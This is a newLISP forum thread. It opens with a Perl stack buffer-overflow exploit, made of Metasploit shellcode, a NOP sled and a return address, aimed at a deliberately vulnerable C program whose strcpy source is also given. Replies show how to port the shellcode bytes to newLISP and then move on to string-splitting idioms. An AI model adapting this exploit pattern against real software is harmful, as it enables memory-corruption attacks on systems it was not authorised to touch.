newlisp vs. perl (not a language war)

[Grundle]

Can anyone tell me what the newlisp equivelent would be to the following perl code?

Code: Select all

  #!/usr/bin/perl
  # linux_ia32_exec -  CMD=ls -l Size=68 Encoder=PexFnstenvSub http://metasploit.com
  my $shellcode =
          "\x2b\xc9\x83\xe9\xf5\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x64" .
"\x96\x2c\xed\x83\xeb\xfc\xe2\xf4\x0e\x9d\x74\x74\x36\xf0\x44\xc0" .
"\x07\x1f\xcb\x85\x4b\xe5\x44\xed\x0c\xb9\x4e\x84\x0a\x1f\xcf\xbf" .
"\x8c\x90\x2c\xed\x64\xfa\x5f\xcd\x49\xfa\x2c\xba\x37\x1f\xcd\x20" .
"\xe4\x96\x2c\xed";
 
  my $nopsled = "\x90" x 208;
  my $ret = "\x70\xf8\xff\xbf"; # 0xbffff870 - we need to convert to little endian
  my $payload = $nopsled . $shellcode . $ret;
  sys("./vuln", $payload); 
  print "Done!\n";

Note: sys should be system, but the board fails on post when I do that I wonder why...

And for those interested in the vuln binary:

Code: Select all

 #include <string>
 #include <stdio>
 #include <stdlib>
 
 void
 overflow (passed_string)
 {
                 char vulnerable_buffer[272];
 
                 strcpy(vulnerable_buffer, passed_string);
 }
 
 int
 main (int argc, char *argv[])
 {
              overflow(argv[1]);
 
                 exit(0);
 }
 

I'm just interested in seeing others solutions. One problem I've had is (maybe?) having to break up the nopsled/shellcode/ret into individual OPCodes and running them through (char) before I could construct a valid payload. Anyone got an idea how to do that a little better?

Thanks guys!

[Lutz]

For manipulating binary code in newLISP look into the manual for the functions:

cpymem, pack, unpack, get-int, get-string, get-char, get-float
and the bit operations >>,<<, ~, ^

most of the string functions can also work on strings which have nulls (zeros) embedded. But some string functions work ion UTF-8 character boundaries rather than 8-bit character boundaries when using UTF-8 enabled versions of newLISP (like the default Mac versions).

You should be able to to do pretty much any binary content manipulation in newLISP.

Lutz

[cormullion]

I understand virtually none of your code, Grundle, but that's my fault for not learning Perl. I deduce that you're working with hex chars, so i can at least suggest:

Code: Select all

(set 'shellcode '(0x2b 0xc9 0x83 0xe9 0xf5 0xd9 0xee 0xd9 0x74 0x24 0xf4 0x5b 0x81 0x73 0x13 0x64 0x96 0x2c 0xed 0x83 0xeb 0xfc 0xe2 0xf4 0x0e 0x9d 0x74 0x74 0x36 0xf0 0x44 0xc0 0x07 0x1f 0xcb 0x85 0x4b 0xe5 0x44 0xed 0x0c 0xb9 0x4e 0x84 0x0a 0x1f 0xcf 0xbf 0x8c 0x90 0x2c 0xed 0x64 0xfa 0x5f 0xcd 0x49 0xfa 0x2c 0xba 0x37 0x1f 0xcd 0x20 0xe4 0x96 0x2c 0xed))

(println (join (map char shellcode)))

+É?éõÙîÙt$ô[?sd?,í?ëüâô?tt6ðDÀË?KåDí¹N?
Ï¿??,ídú_ÍIú,º7Í ä?,í

or it might be easier to work without the 0x's:

Code: Select all

(set 'shellcode "2b  c9  83  e9  f5  d9  ee  d9  74  24  f4  5b  81  73  13  64  96  2c  ed  83  eb  fc  e2  f4  0e  9d  74  74  36  f0  44  c0  07  1f  cb  85  4b  e5  44  ed  0c  b9  4e  84  0a  1f  cf  bf  8c  90  2c  ed  64  fa  5f  cd  49  fa  2c  ba  37  1f  cd  20  e4  96  2c  ed")

(map (fn (c) (print (char (int (append "0x" c))))) (parse shellcode {\s+} 0))

with a similar result. But you probably already know this stuff!

[lisp]

Indeed. I was just hoping I'd be able to use the \xAA format and without spacing each byte out. Oh well.

BTW, the post from grundle was done for me because I was having issues posting a new topic.

[Sammo]

You can convert the \xAA format programatically. For example:

Code: Select all

> (set 'a {\x2b\xc9\x83\xe9\xf5\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x64})
> (map (fn (x) (int (string "0x" x))) (1 (parse a {\x})))
(43 201 131 233 245 217 238 217 116 36 244 91 129 115 19 100)

[lisp]

I have it doing that currently. I just hate to include that function and/or run all my shellcode through a process just to get it ready to be used. Especially when perl/python/ruby/c all use that same format. It's no biggie. Thanks for the help guys. You rock.

[Lutz]

There is an unspaced decimal format:

Code: Select all

(set 'shellcode "\065\066")

; same as Perl:

$shellcode = "\x41\x42" 

If the unspaced hex format is so common, it can be added easily in a future version.

Lutz

[lisp]

The "\xAA\xBB" format is extremely common. I'd really be interested in it's support :)

[HPW]

Where on earth is Location: Lispville, LSP

I would think Lispville is Boca Raton, Florida!
;-)

[cormullion]

While I remember -

I couldn't think of a nice functional way to split a string up into chunks:

Code: Select all

"abcdefghij"
-> ("ab" "cd" "ef" "gh")

Is there a way of doing this without iteration?

I started thinking about an option for explode:

Code: Select all

(explode s n)

where n would be the size of the resulting chunk.

or, more ambitiously, another type of 'parse' (split) that would somehow allow you to split up a string without losing the delimiters. Don't know how you'd specify "every nth character", though...

[Sammo]

Using 'pairs' by Lutz,

Code: Select all

(define (pairs lst n) 
  (array-list (array (/ (length lst) n) n lst)))

we can write

Code: Select all

> (set 'a "abcdefghij")
"abcdefghij"
> (map join (pairs (explode a) 2))
("ab" "cd" "ef" "gh" "ij")

[cormullion]

Yes, nice one!

Although for me, it's not so much that it's not difficult:

Code: Select all

(set 'a "abcdefghijklm")
(for (c 0 (length a) 2) (push (slice a c 2) r -1))
(println r)

;-> ("ab" "cd" "ef" "gh" "ij" "kl" "m")

but that it's not (even) easier:

Code: Select all

(julienne "abcdefghijklm" 2)

;-> ("ab" "cd" "ef" "gh" "ij" "kl" "m")

;-)

[Lutz]

How about this one:

Code: Select all

(find-all ".." "abcdefghijkl")
=> ("ab" "cd" "ef" "gh" "ij" "kl")

The . dot in a regex pattern stands for "any character".

Lutz

[cormullion]

That's good! Or even:

Code: Select all

(find-all {..|.$} "abcdefghijklm")

;-> ("ab" "cd" "ef" "gh" "ij" "kl" "m")

which gets the last character. I still haven't got the hang of find-all...!

[/code]

[lisp]

To split up the shell code, I just use

Code: Select all

:s/\\x/ 0x/g

in vim.